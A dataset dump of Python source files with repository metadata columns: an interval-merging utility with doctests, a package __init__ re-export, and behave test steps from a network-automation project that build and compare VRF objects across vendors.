                merged[idx] = (min(cur_lower, lower), max(cur_upper, upper))
                overlapped = True
        if not overlapped:
            merged.append((cur_lower, cur_upper))
    return [[lower, upper] for lower, upper in merged]
def merge_intervals_faster(intervals):
    """Merge all overlapping closed intervals in a single pass over the sorted input.

    Because the intervals are sorted by lower bound, the current interval can only
    overlap the most recently merged one, so only merged[-1] is checked.

    Args:
        intervals: iterable of [start, end] (or (start, end)) pairs, in any order.

    Returns:
        Sorted list of merged, non-overlapping [lower_bound, upper_bound] lists.

    >>> merge_intervals_faster([[1, 3], [2, 6], [8, 10], [15, 18]])
    [[1, 6], [8, 10], [15, 18]]
    >>> merge_intervals_faster([])
    []
    """
    intervals = list(sorted(intervals))
    if not intervals:
        # The original indexed intervals[0] unconditionally and raised IndexError
        # on empty input; an empty merge result is the natural answer instead.
        return []
    merged = [(intervals[0][0], intervals[0][1])]
    for i in range(1, len(intervals)):
        cur_lower, cur_upper = intervals[i][0], intervals[i][1]
        last_lower, last_upper = merged[-1]
        if last_lower <= cur_lower <= last_upper or last_lower <= cur_upper <= last_upper:
            merged[-1] = (min(cur_lower, last_lower), max(cur_upper, last_upper))
        else:
            merged.append((cur_lower, cur_upper))
    return [[lower, upper] for lower, upper in merged]
if __name__ == '__main__':
    # Run the doctest examples embedded in this module's docstrings.
    import doctest
    doctest.testmod()
| 42.720588
| 114
| 0.726334
| 373
| 2,905
| 5.294906
| 0.160858
| 0.156962
| 0.091139
| 0.066835
| 0.743291
| 0.723038
| 0.723038
| 0.723038
| 0.723038
| 0.723038
| 0
| 0.006743
| 0.183133
| 2,905
| 67
| 115
| 43.358209
| 0.825537
| 0.104303
| 0
| 0.585366
| 0
| 0
| 0.01542
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.04878
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
a097e99dca2077ae741ff51cfc4a217d7725403a
| 233
|
py
|
Python
|
src/carica/interface/__init__.py
|
Trimatix/carica
|
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
|
[
"Apache-2.0"
] | 5
|
2021-09-08T07:29:23.000Z
|
2021-11-24T00:18:22.000Z
|
src/carica/interface/__init__.py
|
Trimatix/Carica
|
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
|
[
"Apache-2.0"
] | 42
|
2021-09-08T07:31:25.000Z
|
2022-01-16T17:39:34.000Z
|
src/carica/interface/__init__.py
|
Trimatix/carica
|
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
|
[
"Apache-2.0"
] | null | null | null |
# Re-export the public serialization names; primativeTypesTuple was previously
# listed twice in this import — the duplicate has been removed.
from .Serializable import ISerializable, SerializableType, \
    PrimativeType, primativeTypes, primativeTypesTuple, serializableTypes, \
    serializableTypesTuple
| 77.666667
| 100
| 0.665236
| 11
| 233
| 14.090909
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.291845
| 233
| 3
| 101
| 77.666667
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
a0b70a82fc4613563797738f8c6808bdb4074792
| 55,367
|
py
|
Python
|
tests/features/steps/vrf_tests.py
|
Netests/netests
|
1a48bda461761c4ec854d6fa0c38629049009a4a
|
[
"MIT"
] | 14
|
2020-06-08T07:34:59.000Z
|
2022-03-14T08:52:03.000Z
|
tests/features/steps/vrf_tests.py
|
Netests/netests
|
1a48bda461761c4ec854d6fa0c38629049009a4a
|
[
"MIT"
] | null | null | null |
tests/features/steps/vrf_tests.py
|
Netests/netests
|
1a48bda461761c4ec854d6fa0c38629049009a4a
|
[
"MIT"
] | 3
|
2020-06-19T03:57:05.000Z
|
2020-06-22T22:46:42.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import yaml
import textfsm
from netests.protocols.vrf import VRF, ListVRF
from netests.comparators.vrf_compare import _compare_vrf
from netests.converters.vrf.arista.api import _arista_vrf_api_converter
from netests.converters.vrf.arista.nc import _arista_vrf_nc_converter
from netests.converters.vrf.arista.ssh import _arista_vrf_ssh_converter
from netests.converters.vrf.cumulus.api import _cumulus_vrf_api_converter
from netests.converters.vrf.cumulus.ssh import _cumulus_vrf_ssh_converter
from netests.converters.vrf.extreme_vsp.ssh import _extreme_vsp_vrf_ssh_converter
from netests.converters.vrf.ios.api import _ios_vrf_api_converter
from netests.converters.vrf.ios.nc import _ios_vrf_nc_converter
from netests.converters.vrf.ios.ssh import _ios_vrf_ssh_converter
from netests.converters.vrf.iosxr.ssh import _iosxr_vrf_ssh_converter
from netests.converters.vrf.iosxr.nc import _iosxr_vrf_nc_converter
from netests.converters.vrf.juniper.api import _juniper_vrf_api_converter
from netests.converters.vrf.juniper.nc import _juniper_vrf_nc_converter
from netests.converters.vrf.juniper.ssh import _juniper_vrf_ssh_converter
from netests.converters.vrf.napalm.converter import _napalm_vrf_converter
from netests.converters.vrf.nxos.nc import _nxos_vrf_nc_converter
from netests.converters.vrf.nxos.rc import _nxos_vrf_rc_converter
from netests.converters.vrf.nxos.ssh import _nxos_vrf_ssh_converter
from netests.constants import NOT_SET, FEATURES_SRC_PATH, VRF_DATA_KEY
from netests.tools.file import open_file, open_txt_file, open_json_file, open_txt_file_as_bytes
@given(u'A network protocols named VRF defined in netests/protocols/vrf.py')
def step_impl(context):
    # Scenario-wide scratch list used to record features that are not implemented.
    context.test_not_implemented = list()


@given(u'I create a VRF object equals to Arista manually named o0001')
def step_impl(context):
    # Hand-built expected result for the Arista "many VRF" captures.
    context.o0001 = ListVRF(vrf_lst=list())
    context.o0001.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0001.vrf_lst.append(VRF(
        vrf_name="CUSTOMER_NETESTS", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0001.vrf_lst.append(VRF(
        vrf_name="CUSTOMER_WEJOB", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd="1111:11",
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a Arista API output named o0002')
def step_impl(context):
    context.o0002 = _arista_vrf_api_converter(
        hostname="leaf03",
        cmd_output=open_json_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/arista/api/arista_api_get_vrf_many_vrf.json"))


@given(u'I create a VRF object from a Arista Netconf named o0003')
def step_impl(context):
    context.o0003 = _arista_vrf_nc_converter(
        hostname="leaf03",
        cmd_output=open_json_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/arista/netconf/arista_nc_get_vrf_many_vrf.json"))


@given(u'I create a VRF object from a Arista SSH output named o0004')
def step_impl(context):
    context.o0004 = _arista_vrf_ssh_converter(
        hostname="leaf03",
        cmd_output=open_json_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/arista/ssh/arista_cli_get_vrf_many_vrf.json"))


@given(u'I create a VRF object equals to Arista no config manually named o0011')
def step_impl(context):
    # Expected result when no VRF is configured: only the default VRF exists.
    context.o0011 = ListVRF(vrf_lst=list())
    context.o0011.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a Arista no config API output named o0012')
def step_impl(context):
    context.o0012 = _arista_vrf_api_converter(
        hostname="leaf03",
        cmd_output=open_json_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/arista/api/arista_api_get_vrf_no_config.json"))


@given(u'I create a VRF object from a Arista no config Netconf named o0013')
def step_impl(context):
    context.o0013 = _arista_vrf_nc_converter(
        hostname="leaf03",
        cmd_output=open_json_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/arista/netconf/arista_nc_get_vrf_no_config.json"))


@given(u'I create a VRF object from a Arista no config SSH output named o0014')
def step_impl(context):
    context.o0014 = _arista_vrf_ssh_converter(
        hostname="leaf03",
        cmd_output=open_json_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/arista/ssh/arista_cli_get_vrf_no_config.json"))


@given(u'I create a VRF object equals to Arista one vrf manually named o0021')
def step_impl(context):
    # Expected result when exactly one non-default VRF is configured.
    context.o0021 = ListVRF(vrf_lst=list())
    context.o0021.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0021.vrf_lst.append(VRF(
        vrf_name="CUSTOMER_NETESTS", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a Arista one vrf API output named o0022')
def step_impl(context):
    context.o0022 = _arista_vrf_api_converter(
        hostname="leaf03",
        cmd_output=open_json_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/arista/api/arista_api_get_vrf_one_vrf.json"))


@given(u'I create a VRF object from a Arista one vrf Netconf named o0023')
def step_impl(context):
    context.o0023 = _arista_vrf_nc_converter(
        hostname="leaf03",
        cmd_output=open_json_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/arista/netconf/arista_nc_get_vrf_one_vrf.json"))


@given(u'I create a VRF object from a Arista one vrf SSH output named o0024')
def step_impl(context):
    context.o0024 = _arista_vrf_ssh_converter(
        hostname="leaf03",
        cmd_output=open_json_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/arista/ssh/arista_cli_get_vrf_one_vrf.json"))
@given(u'I create a VRF object equals to Cumulus manually named o0101')
def step_impl(context):
    # Hand-built expected result: Cumulus reports numeric table ids for each VRF.
    context.o0101 = ListVRF(vrf_lst=list())
    context.o0101.vrf_lst.append(VRF(
        vrf_name="default", vrf_id="1000", vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0101.vrf_lst.append(VRF(
        vrf_name="mgmt", vrf_id="1001", vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a Cumulus API output named o0102')
def step_impl(context):
    context.o0102 = _cumulus_vrf_api_converter(
        hostname="leaf01",
        cmd_output=open_txt_file_as_bytes(path=f"{FEATURES_SRC_PATH}outputs/vrf/cumulus/api/cumulus_http_show_vrf.txt"))


@given(u'I create a VRF object from a Cumulus Netconf named o0103')
def step_impl(context):
    # Netconf is not available on Cumulus, so there is nothing to convert.
    print("Cumulus Facts with Netconf not possible -> Not tested")


@given(u'I create a VRF object from a Cumulus SSH output named o0104')
def step_impl(context):
    context.o0104 = _cumulus_vrf_ssh_converter(
        hostname="leaf01",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/cumulus/ssh/cumulus_net_show_vrf.txt"))
@given(u'I create a VRF object equals to Extreme VSP manually named o0201')
def step_impl(context):
    # Hand-built expected result for the Extreme VSP capture.
    context.o0201 = ListVRF(vrf_lst=list())
    context.o0201.vrf_lst.append(VRF(
        vrf_name="GlobalRouter", vrf_id="0", vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0201.vrf_lst.append(VRF(
        vrf_name="mgmt_vrf", vrf_id="1", vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0201.vrf_lst.append(VRF(
        vrf_name="MgmtRouter", vrf_id="512", vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a Extreme VSP API output named o0204')
def step_impl(context):
    # No API endpoint exposes VRFs on Extreme VSP, so this path is not exercised.
    print("Extreme VSP VRF with API has no endpoint -> Not tested")


@given(u'I create a VRF object from a Extreme VSP Netconf output named o0204')
def step_impl(context):
    # Netconf is not available on Extreme VSP, so there is nothing to convert.
    print("Extreme VSP VRF with Netconf not possible -> Not tested")


@given(u'I create a VRF object from a Extreme VSP SSH output named o0204')
def step_impl(context):
    context.o0204 = _extreme_vsp_vrf_ssh_converter(
        hostname="spine02",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/extreme_vsp/ssh/extreme_vsp_show_ip_vrf.txt"))
@given(u'I create a VRF object equals to IOS manually named o0301')
def step_impl(context):
    # Hand-built expected result for the IOS "full config" captures.
    context.o0301 = ListVRF(vrf_lst=list())
    context.o0301.vrf_lst.append(VRF(
        vrf_name="default", vrf_id="0", vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0301.vrf_lst.append(VRF(
        vrf_name="MGMT_VRF", vrf_id="1", vrf_type=NOT_SET, l3_vni=NOT_SET, rd="65000:999",
        rt_imp="65100:9", rt_exp="65100:9", imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0301.vrf_lst.append(VRF(
        vrf_name="SECURE_ZONE", vrf_id="2", vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a IOS API output named o0302')
def step_impl(context):
    context.o0302 = _ios_vrf_api_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/api/cisco_ios_api_get_vrf.xml"))


@given(u'I create a VRF object from a IOS Netconf named o0303')
def step_impl(context):
    context.o0303 = _ios_vrf_nc_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/netconf/cisco_ios_nc_get_vrf.xml"))


@given(u'I create a VRF object from a IOS SSH named o0304')
def step_impl(context):
    context.o0304 = _ios_vrf_ssh_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/ssh/cisco_ios_show_ip_vrf_detail.txt"))


@given(u'I create a VRF object equals to IOS no config manually named o0311')
def step_impl(context):
    # Expected result when no VRF is configured: only the default VRF exists.
    context.o0311 = ListVRF(vrf_lst=list())
    context.o0311.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a IOS no config API named o0312')
def step_impl(context):
    context.o0312 = _ios_vrf_api_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/api/cisco_ios_api_get_vrf_no_config.xml"))


@given(u'I create a VRF object from a IOS no config Netconf named o0313')
def step_impl(context):
    context.o0313 = _ios_vrf_nc_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/netconf/cisco_ios_nc_get_vrf_no_config.xml"))


@given(u'I create a VRF object from a IOS no config SSH named o0314')
def step_impl(context):
    context.o0314 = _ios_vrf_ssh_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/ssh/cisco_ios_ssh_get_vrf_no_config.txt"))


@given(u'I create a VRF object equals to IOS one vrf manually named o0321')
def step_impl(context):
    # Expected result when exactly one non-default VRF is configured.
    context.o0321 = ListVRF(vrf_lst=list())
    context.o0321.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0321.vrf_lst.append(VRF(
        vrf_name="CUSTOMER_001", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd="65123:123",
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a IOS one vrf API named o0322')
def step_impl(context):
    context.o0322 = _ios_vrf_api_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/api/cisco_ios_api_get_vrf_only_one.xml"))


@given(u'I create a VRF object from a IOS one vrf Netconf named o0323')
def step_impl(context):
    context.o0323 = _ios_vrf_nc_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/netconf/cisco_ios_nc_get_vrf_only_one.xml"))


@given(u'I create a VRF object from a IOS one vrf SSH named o0324')
def step_impl(context):
    context.o0324 = _ios_vrf_ssh_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/ssh/cisco_ios_ssh_get_vrf_only_one.txt"))


@given(u'I create a VRF object equals to IOS many manually named o0331')
def step_impl(context):
    # Expected result for the "many VRFs" IOS captures, including RT import/export.
    context.o0331 = ListVRF(vrf_lst=list())
    context.o0331.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0331.vrf_lst.append(VRF(
        vrf_name="CUSTOMER_001", vrf_id="1", vrf_type=NOT_SET, l3_vni=NOT_SET, rd="65123:123",
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0331.vrf_lst.append(VRF(
        vrf_name="CUSTOMER_002", vrf_id="2", vrf_type=NOT_SET, l3_vni=NOT_SET, rd="65123:123",
        rt_imp="65222:2", rt_exp="65222:1", imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a IOS many API named o0332')
def step_impl(context):
    context.o0332 = _ios_vrf_api_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/api/cisco_ios_api_get_vrf_many.xml"))


@given(u'I create a VRF object from a IOS many Netconf named o0333')
def step_impl(context):
    context.o0333 = _ios_vrf_nc_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/netconf/cisco_ios_nc_get_vrf_many.xml"))


@given(u'I create a VRF object from a IOS many SSH named o0334')
def step_impl(context):
    context.o0334 = _ios_vrf_ssh_converter(
        hostname="leaf05",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/ios/ssh/cisco_ios_ssh_get_vrf_many.txt"))
@given(u'I create a VRF object equals to IOS-XR manually named o0401')
def step_impl(context):
    # Hand-built expected result for the IOS-XR "full config" captures.
    context.o0401 = ListVRF(vrf_lst=list())
    context.o0401.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type="Regular", l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0401.vrf_lst.append(VRF(
        vrf_name="EXTERNAL_PEERING", vrf_id=NOT_SET, vrf_type="Regular", l3_vni=NOT_SET, rd="65000:100",
        rt_imp="65000:1", rt_exp="65000:1", imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0401.vrf_lst.append(VRF(
        vrf_name="MGMT_VRF", vrf_id=NOT_SET, vrf_type="Regular", l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a IOS-XR API output named o0402')
def step_impl(context):
    # No API path for IOS-XR VRFs: mark the scenario so it is skipped.
    context.scenario.tags.append("own_skipped")


@given(u'I create a VRF object from a IOS-XR Netconf output named o403')
def step_impl(context):
    # Netconf needs two captures: the VRF tree plus the BGP tree (for RD/RT data).
    captures = dict()
    captures['VRF'] = open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/cisco_iosxr_nc_get_vrf.xml")
    captures['BGP'] = open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/cisco_iosxr_nc_get_bgp.xml")
    context.o403 = _iosxr_vrf_nc_converter(hostname="spine03", cmd_output=captures)


@given(u'I create a VRF object from a IOS-XR SSH output named o0404')
def step_impl(context):
    context.o0404 = _iosxr_vrf_ssh_converter(
        hostname="spine03",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/ssh/cisco_iosxr_show_vrf_all_detail.txt"))


@given(u'I create a VRF object equals IOS-XR multi manually output named o0405')
def step_impl(context):
    # Expected result for the "multi VRF" IOS-XR captures.
    context.o0405 = ListVRF(vrf_lst=list())
    context.o0405.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type="Regular", l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0405.vrf_lst.append(VRF(
        vrf_name="EXTERNAL_PEERING", vrf_id=NOT_SET, vrf_type="Regular", l3_vni=NOT_SET, rd="65000:100",
        rt_imp="65000:1", rt_exp="65000:1", imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0405.vrf_lst.append(VRF(
        vrf_name="MGMT_VRF", vrf_id=NOT_SET, vrf_type="Regular", l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0405.vrf_lst.append(VRF(
        vrf_name="INTERNAL_PEERING", vrf_id=NOT_SET, vrf_type="Regular", l3_vni=NOT_SET, rd="65000:200",
        rt_imp="65000:2", rt_exp="65000:2", imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a IOS-XR multi Netconf output named o0406')
def step_impl(context):
    captures = dict()
    captures['VRF'] = open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/cisco_iosxr_nc_get_vrf2.xml")
    captures['BGP'] = open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/cisco_iosxr_nc_get_bgp2.xml")
    context.o0406 = _iosxr_vrf_nc_converter(hostname="spine03", cmd_output=captures)


@given(u'I create a VRF object equals to IOS-XR no config manually named o0411')
def step_impl(context):
    # Expected result when no VRF is configured: only the default VRF exists.
    context.o0411 = ListVRF(vrf_lst=list())
    context.o0411.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type="Regular", l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a IOS-XR no config API named o0412')
def step_impl(context):
    # No API path for IOS-XR VRFs: mark the scenario so it is skipped.
    context.scenario.tags.append("own_skipped")


@given(u'I create a VRF object from a IOS-XR no config Netconf named o0413')
def step_impl(context):
    captures = dict()
    captures['VRF'] = open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/cisco_iosxr_nc_get_vrf_no_config.xml")
    captures['BGP'] = open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/cisco_iosxr_nc_get_bgp_no_config.xml")
    context.o0413 = _iosxr_vrf_nc_converter(hostname="spine03", cmd_output=captures)


@given(u'I create a VRF object from a IOS-XR no config SSH named o0414')
def step_impl(context):
    context.o0414 = _iosxr_vrf_ssh_converter(
        hostname="spine03",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/ssh/cisco_iosxr_show_vrf_all_detail_no_config.txt"))


@given(u'I create a VRF object equals to IOS-XR one vrf manually named o0421')
def step_impl(context):
    # Expected result when exactly one non-default VRF is configured.
    context.o0421 = ListVRF(vrf_lst=list())
    context.o0421.vrf_lst.append(VRF(
        vrf_name="default", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))
    context.o0421.vrf_lst.append(VRF(
        vrf_name="CUSTOMER_NETESTS", vrf_id=NOT_SET, vrf_type=NOT_SET, l3_vni=NOT_SET, rd=NOT_SET,
        rt_imp=NOT_SET, rt_exp=NOT_SET, imp_targ=NOT_SET, exp_targ=NOT_SET))


@given(u'I create a VRF object from a IOS-XR one vrf API named o0422')
def step_impl(context):
    # No API path for IOS-XR VRFs: mark the scenario so it is skipped.
    context.scenario.tags.append("own_skipped")


@given(u'I create a VRF object from a IOS-XR one vrf Netconf named o0423')
def step_impl(context):
    captures = dict()
    captures['VRF'] = open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/cisco_iosxr_nc_get_vrf_one_vrf.xml")
    captures['BGP'] = open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/cisco_iosxr_nc_get_bgp_one_vrf.xml")
    context.o0423 = _iosxr_vrf_nc_converter(hostname="spine03", cmd_output=captures)


@given(u'I create a VRF object from a IOS-XR one vrf SSH named o0424')
def step_impl(context):
    context.o0424 = _iosxr_vrf_ssh_converter(
        hostname="spine03",
        cmd_output=open_txt_file(path=f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/ssh/cisco_iosxr_show_vrf_all_detail_one_vrf.txt"))
@given(u'I create a VRF object equals to Juniper manually named o0501')
def step_impl(context):
    # Expected Juniper result: default + one customer VRF + mgmt_junos.
    # Only the keys listed per entry differ from the NOT_SET defaults.
    defaults = dict(
        l3_vni=NOT_SET,
        rd=NOT_SET,
        rt_imp=NOT_SET,
        rt_exp=NOT_SET,
        imp_targ=NOT_SET,
        exp_targ=NOT_SET,
    )
    vrf_specs = [
        dict(
            vrf_name="default",
            vrf_id="100.123.1.0",
            vrf_type="forwarding",
        ),
        dict(
            vrf_name="CUSTOMER_001",
            vrf_id="7.7.7.7",
            vrf_type="vrf",
            rd="65333:333",
            rt_imp="__vrf-import-CUSTOMER_001-internal__",
            rt_exp="__vrf-export-CUSTOMER_001-internal__",
            imp_targ="65333:333",
            exp_targ="65333:333",
        ),
        dict(
            vrf_name="mgmt_junos",
            vrf_id="0.0.0.0",
            vrf_type="forwarding",
        ),
    ]
    context.o0501 = ListVRF(vrf_lst=[])
    for spec in vrf_specs:
        context.o0501.vrf_lst.append(VRF(**{**defaults, **spec}))
@given(u'I create a VRF object from a Juniper API output named o0502')
def step_impl(context):
    # Convert the stored Juniper API (XML) output into a VRF object.
    api_output = open_file(
        path=(
            f"{FEATURES_SRC_PATH}outputs/vrf/juniper/api/"
            "juniper_api_get_vrf.xml"
        )
    )
    context.o0502 = _juniper_vrf_api_converter(
        hostname="leaf04",
        cmd_output=api_output,
    )
@given(u'I create a VRF object from a Juniper Netconf output named o0503')
def step_impl(context):
    # Convert the stored Juniper Netconf (XML) output into a VRF object.
    nc_output = open_file(
        path=(
            f"{FEATURES_SRC_PATH}outputs/vrf/juniper/netconf/"
            "get_instance_information_details.xml"
        )
    )
    context.o0503 = _juniper_vrf_nc_converter(
        hostname="leaf04",
        cmd_output=nc_output,
    )
@given(u'I create a VRF object from a Juniper SSH output named o0504')
def step_impl(context):
    # Convert the stored Juniper SSH (JSON) output into a VRF object.
    ssh_output = open_file(
        path=(
            f"{FEATURES_SRC_PATH}outputs/vrf/juniper/ssh/"
            "juniper_show_route_instance_detail.json"
        )
    )
    context.o0504 = _juniper_vrf_ssh_converter(
        hostname="leaf04",
        cmd_output=ssh_output,
    )
@given(u'I create a VRF object equals to NAPALM manually named o0601')
def step_impl(context):
    # Expected NAPALM result: only name, type and (for MGMT_VRF) the RD
    # are known; everything else stays NOT_SET.
    context.o0601 = ListVRF(vrf_lst=[])
    for name, vrf_type, rd in (
        ("MGMT_VRF", "L3VRF", "65000:999"),
